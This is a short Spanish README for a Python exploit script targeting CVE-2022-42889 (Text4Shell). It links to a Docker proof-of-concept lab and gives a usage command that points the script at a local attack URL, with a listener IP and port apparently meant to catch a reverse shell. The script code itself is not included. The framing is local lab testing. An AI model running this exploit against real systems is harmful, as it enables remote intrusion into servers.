
script de Python para CVE-2022-42889
Script de Python para CVE-2022-42889
Para probar esto localmente sigue el POC de docker: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
Para una versión PHP de esto: https://github.com/ClickCyber/cve-2022-42889
Si estás ejecutando esto y explotándolo localmente, la IP que debes usar es la puerta de enlace generada cuando se crea el contenedor docker
Después de obtener una shell bash en el contenedor docker

Asegúrate de hacer ejecutable el script con chmod
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889